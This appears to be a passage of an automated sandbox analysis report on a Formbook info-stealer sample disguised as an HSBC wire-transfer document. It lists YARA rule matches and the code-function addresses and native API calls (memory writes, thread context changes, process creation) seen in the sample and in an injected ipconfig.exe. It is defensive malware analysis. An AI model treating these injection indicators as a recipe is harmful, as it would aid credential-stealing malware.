          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 0_2_00C682500_2_00C68250
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 0_2_00C6D2F80_2_00C6D2F8
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041E30C6_2_0041E30C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041DB366_2_0041DB36
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00409E5F6_2_00409E5F
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00409E606_2_00409E60
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041D6AE6_2_0041D6AE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_00C05C246_2_00C05C24
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016441206_2_01644120
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0162F9006_2_0162F900
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016499BF6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016FE8246_2_016FE824
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A8306_2_0164A830
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E10026_2_016E1002
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F28EC6_2_016F28EC
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016520A06_2_016520A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F20A86_2_016F20A8
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163B0906_2_0163B090
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164AB406_2_0164AB40
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F2B286_2_016F2B28
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0164A3096_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016D23E36_2_016D23E3
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E03DA6_2_016E03DA
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016EDBD26_2_016EDBD2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165ABD86_2_0165ABD8
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0165EBB06_2_0165EBB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016DFA2B6_2_016DFA2B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E4AEF6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F22AE6_2_016F22AE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F1D556_2_016F1D55
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01620D206_2_01620D20
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F2D076_2_016F2D07
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163D5E06_2_0163D5E0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F25DD6_2_016F25DD
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016525816_2_01652581
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E2D826_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016ED4666_2_016ED466
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0163841F6_2_0163841F
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016E44966_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F1FF16_2_016F1FF1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016FDFCE6_2_016FDFCE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01646E306_2_01646E30
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016ED6166_2_016ED616
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016F2EF76_2_016F2EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366AB4016_2_0366AB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03712B2816_2_03712B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370DBD216_2_0370DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037003DA16_2_037003DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367EBB016_2_0367EBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036FFA2B16_2_036FFA2B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037122AE16_2_037122AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366412016_2_03664120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0364F90016_2_0364F900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036699BF16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0371E82416_2_0371E824
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0366A83016_2_0366A830
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370100216_2_03701002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037128EC16_2_037128EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036720A016_2_036720A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037120A816_2_037120A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365B09016_2_0365B090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03711FF116_2_03711FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0371DFCE16_2_0371DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03666E3016_2_03666E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370D61616_2_0370D616
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03712EF716_2_03712EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03711D5516_2_03711D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03640D2016_2_03640D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03712D0716_2_03712D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365D5E016_2_0365D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_037125DD16_2_037125DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0367258116_2_03672581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0370D46616_2_0370D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0365841F16_2_0365841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7D6AE16_2_02C7D6AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C69E5F16_2_02C69E5F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C69E6016_2_02C69E60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C62FB016_2_02C62FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C62D9016_2_02C62D90
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: String function: 0162B150 appears 133 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 0364B150 appears 72 times
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A360 NtCreateFile,6_2_0041A360
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A410 NtReadFile,6_2_0041A410
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A490 NtClose,6_2_0041A490
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A540 NtAllocateVirtualMemory,6_2_0041A540
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A35A NtCreateFile,6_2_0041A35A
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0041A3B2 NtCreateFile,6_2_0041A3B2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_01669910
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016699A0 NtCreateSection,LdrInitializeThunk,6_2_016699A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669860 NtQuerySystemInformation,LdrInitializeThunk,6_2_01669860
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669840 NtDelayExecution,LdrInitializeThunk,6_2_01669840
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016698F0 NtReadVirtualMemory,LdrInitializeThunk,6_2_016698F0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669A50 NtCreateFile,LdrInitializeThunk,6_2_01669A50
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669A20 NtResumeThread,LdrInitializeThunk,6_2_01669A20
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669A00 NtProtectVirtualMemory,LdrInitializeThunk,6_2_01669A00
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669540 NtReadFile,LdrInitializeThunk,6_2_01669540
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016695D0 NtClose,LdrInitializeThunk,6_2_016695D0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669710 NtQueryInformationToken,LdrInitializeThunk,6_2_01669710
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016697A0 NtUnmapViewOfSection,LdrInitializeThunk,6_2_016697A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669780 NtMapViewOfSection,LdrInitializeThunk,6_2_01669780
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_01669660
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016696E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_016696E0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669950 NtQueueApcThread,6_2_01669950
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016699D0 NtCreateProcessEx,6_2_016699D0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166B040 NtSuspendThread,6_2_0166B040
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669820 NtEnumerateKey,6_2_01669820
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016698A0 NtWriteVirtualMemory,6_2_016698A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669B00 NtSetValueKey,6_2_01669B00
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166A3B0 NtGetContextThread,6_2_0166A3B0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669A10 NtQuerySection,6_2_01669A10
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669A80 NtOpenDirectoryObject,6_2_01669A80
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669560 NtWriteFile,6_2_01669560
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669520 NtWaitForSingleObject,6_2_01669520
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166AD30 NtSetContextThread,6_2_0166AD30
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016695F0 NtQueryInformationFile,6_2_016695F0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669760 NtOpenProcess,6_2_01669760
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166A770 NtOpenThread,6_2_0166A770
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669770 NtSetInformationFile,6_2_01669770
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669730 NtQueryVirtualMemory,6_2_01669730
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_0166A710 NtOpenProcessToken,6_2_0166A710
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669FE0 NtCreateMutant,6_2_01669FE0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669670 NtQueryInformationProcess,6_2_01669670
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669650 NtQueryValueKey,6_2_01669650
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_01669610 NtEnumerateValueKey,6_2_01669610
